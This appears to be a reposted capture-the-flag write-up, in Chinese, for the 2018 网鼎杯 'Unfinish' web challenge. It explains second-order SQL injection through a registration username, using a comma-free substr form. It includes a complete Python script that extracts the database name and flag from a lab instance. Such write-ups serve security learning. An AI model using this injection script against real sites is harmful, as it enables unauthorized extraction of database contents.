网鼎杯-2018-Web-Unfinish

news2024/12/25 9:06:47

先尝试万能注入:

如果万能注入缺少符号,如果加@符又进不去,那我们尝试扫描文件,然后发现有一个register.php的文件,应该是注册页面,我们去打开

 

知道存储的文件,并利用状态码进行过滤

我们注册的用户名就是aaa,可以看出它回显出来了,我们尝试从这个地方注入

 

测试发现过滤了逗号、information等,那么使用盲注应该不太行了

所以我们考虑用户名这里可能存在 二次注入 。

经过尝试,构造username=select database(),登录后显示用户名还是为select database(),说明后台代码可能把username用单引号引起来了,导致其无法显示。

因为题目中过滤掉了逗号,因此用from for来代替

ASCII码如下:

最后我们验证出数据库名为web

以下是我编写的python脚本,可以跑出数据库名称以及最终的flag

import requests

import time

from bs4 import BeautifulSoup       #html解析器

def getDatabase():

    database = ''

    for i in range(10):

        data_database = {

            'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",

            'password':'admin',

            "email":"admin11@admin.com"+str(i)

        }

        #注册

        requests.post("http://5aec7f20-ca5b-498d-b028-fa5950c9c5e7.node5.buuoj.cn:81/register.php",data_database)

        login_data={

            'password':'admin',

            "email":"admin11@admin.com"+str(i)

        }

        response=requests.post("http://5aec7f20-ca5b-498d-b028-fa5950c9c5e7.node5.buuoj.cn:81/login.php",login_data)

        html=response.text                  #返回的页面

        soup=BeautifulSoup(html,'html.parser')

        getUsername=soup.find_all('span')[0]#获取用户名

        username=getUsername.text

        if int(username)==0:

            break

        database+=chr(int(username))

    return database

def getFlag():

    flag = ''

    for i in range(40):

        data_flag = {

            'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",

            'password':'admin',

            "email":"admin32@admin.com"+str(i)

        }

        #注册

        requests.post("http://5aec7f20-ca5b-498d-b028-fa5950c9c5e7.node5.buuoj.cn:81/register.php",data_flag)

        login_data={

            'password':'admin',

            "email":"admin32@admin.com"+str(i)

        }

        response=requests.post("http://5aec7f20-ca5b-498d-b028-fa5950c9c5e7.node5.buuoj.cn:81/login.php",login_data)

        html=response.text                  #返回的页面

        soup=BeautifulSoup(html,'html.parser')

        getUsername=soup.find_all('span')[0]#获取用户名

        username=getUsername.text

        if int(username)==0:

            break

        flag+=chr(int(username))

    return flag

print(getDatabase())

print(getFlag())

最终得到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2041111.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

鼠害监测系统:科技守护农业安全

在农业生产中,鼠害一直是威胁作物安全、影响产量的重要因素。然而,随着科技的飞速发展,鼠害监测系统正逐步成为现代农业防治鼠害的重要利器。 鼠害监测系统巧妙融合了现代光电、数控及物联网技术,实现了诱鼠、投喂鼠药、鼠情监测及…

RoBERTa-www-ext 解读及使用方法

背景:模型及名字 hfl/chinese-roberta-wwm-ext 是 Hugging Face 提供的一个中文预训练模型,它是 RoBERTa 的一个变种,特别针对中文进行了优化。这个模型的名称中的“wwm”代表“word-level whole word masking”,意味着在预训练过…

爬虫案例3——爬取彩票双色球数据

简介:个人学习分享,如有错误,欢迎批评指正 任务:从500彩票网中爬取双色球数据 目标网页地址:https://datachart.500.com/ssq/ 一、思路和过程 目标网页具体内容如下: ​​​​​ 我们的任务是将上图中…

数学建模——启发式算法(蚁群算法)

算法原理 蚁群算法来自于蚂蚁寻找食物过程中发现路径的行为。蚂蚁并没有视觉却可以寻找到食物,这得益于蚂蚁分泌的信息素,蚂蚁之间相互独立,彼此之间通过信息素进行交流, 从而实现群体行为。 蚁群算法的基本原理就是蚂蚁觅食的过程…

一套完整的NVR方案与部分NVR录像机GUI源码剖析

一、部分功能展示 1.1 通道管理部分 在NVR系统中,通道管理是核心功能之一。通过通道管理,用户可以对连接的摄像头进行配置和监控。 通道连接使能:用户可以选择开启或关闭特定通道的连接功能,以实现灵活的设备管理。 时间同步&…

Aigtek高压功率放大器指标参数是什么

高压功率放大器是一种用于将电信号放大到较高电压水平的设备。其指标参数对于选择、设计和应用都至关重要。以下是一些常见的高压功率放大器指标参数,详细了解这些参数可以帮助工程师更好地了解设备的性能和适用范围。 电压增益: 电压增益是功率放大器输…

每日一题,力扣leetcode Hot100之189.轮转数组

解题思路,把数组轮换想成栈的出栈后又入栈即可,当然要判断好K的量,因为K有可能会超过数组长度 class Solution:def rotate(self, nums: List[int], k: int) -> None:"""Do not return anything, modify nums in-place ins…

25款极氪007上市,小米SU7就不该买?

文 | AUTO芯球 作者 | 谦行 我是刚刚才知道 买小米SU7的原来是盯着他这两个功能 可爱的小女孩喊小爱同学帮她停个车 妈妈给她说SU7自己能停好,她还叮嘱一句“小爱同学你给我好好停” SU7滴溜溜的就停在车位上,全程不到一分钟 视频属实温馨&#x…

剪辑新手必备:2024年爱剪辑官网免费版下载指南

嘿,朋友们!现在视频在我们生活中就像空气一样,无处不在。无论是记录日常生活的小片段,还是制作一些有趣的视频内容,一款好的剪辑软件都特别关键。今天咱们就来聊聊2024年那些特别受欢迎的剪辑软件,顺便推荐…

Linux---03---网络及防火墙

课程回顾 虚拟安装 文件命令 本章重点 网络相关概念 静态网络配置 一、网络 1.1 什么是网络? 计算机网络是继电信网络、有线电视网络之后出现的世界级大型网络。 计算机网络由若干个结点和连接这些结点的链路组成。 网络中的结点可以是计算机、交换机、路…

虚幻5|给攻击添加特效

一,打开武器蓝图 选择武器网格体,在细节处找到组件开始重叠,点击 写下以下蓝图,这是最终蓝图,后面会分讲要点 二,actor拥有标签,就是被击打的敌人,我们给actor添加标签 到主界面&am…

Linux之sed命令和正则表达式

什么是sed编辑器? sed是一个命令行文本编辑工具,用于对文本进行处理和转换。它可以读取文本文件,对文件的各个行进行修改、删除和替换操作,并将结果输出到标准输出或者文件中。 sed 被广泛用于Unix和类Unix系统中的脚本和命令行操作中&#…

二极管作用

防止电源反接 电路目的是为了,防止电源反接,对电路中的电子元器件造成破坏,造成财产损失或者人身安全。 原理 二极管单向导电性,二极管0.7V正向压降不会对电路造成影响 原理图 这里U7是一个二极管,如果电源反接&…

C++STL初阶(10):list的简易实现(下)

在上一文中我们完成了链表的多数基本接口,本文主要围绕构造函数进行补充 1. 链表的拷贝 在前文中我们没有手动实现拷贝构造,所以使用的就是编译器自动生成的浅拷贝 先使用一下编译器自动生成的浅拷贝: 我们在打印li2之前给li1加入一个数据&…

Python 如何使用 Contextlib 模块

Python 中的 contextlib 模块提供了一些实用工具,帮助我们管理上下文管理器和与上下文相关的操作。上下文管理器是一种对象,它定义了进入和退出代码块时要执行的操作,通常用于资源管理,如文件操作、网络连接等。上下文管理器通常与…

【SPIE出版】第四届计算机视觉、应用与算法国际学术会议(CVAA 2024,10月11-13)

计算机视觉、应用与算法的领域,一直在飞速发展,第四届计算机视觉、应用与算法国际学术会议(CVAA 2024) 将汇聚世界各地的顶尖学者、研究人员和企业代表,共同分享和交流计算机视觉在各个领域的最新研究成果、技术突破和产业应用。 …

ElementPlus table上移下移操作、表格嵌套树选择器

步骤条圆圈中的数字根据所选样式展示&#xff1a; <el-stepsstyle"margin-top: 20px; max-width: 700px"align-center:active"formModel.testData.length 1"><el-steptitle"Step 1"v-for"(item, index) in formModel.testData&qu…

技术应用 | 外语专业如何借助大模型转型升级?

一、选哪一条路&#xff1a;评测大模型、应用大模型、研发大模型 如果把大语言模型当作是“一个人”&#xff0c;那么既可以把这个“人”当作研究对象&#xff0c;研究它几岁了、智商如何了、能做什么、不能做什么、危不危险&#xff0c;也就是“评测大模型”&#xff1b;也可…

django电商易购系统-计算机毕业设计源码61059

目 录 1 绪论 1.1选题背景 1.2研究意义 1.3论文结构与章节安排 2 电商易购系统系统分析 2.1 可行性分析 2.2 系统流程分析 2.2.1 数据流程 3.3.2 业务流程 2.3 系统功能分析 2.3.1 功能性分析 2.3.2 非功能性分析 2.4 系统用例分析 2.5本章小结 3 电商易购系统总…

Java设计模式-原型模式-一次性理解透

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 1. 前言2. 原型模式的主要角色2.1 原型接口或抽象类2.2 具体原型类2.3 客户端2.4 克隆方法 3. 原型模式使用场景3.1 创建对象是昂贵的3.2 对象的变化3.3 动态配置3.…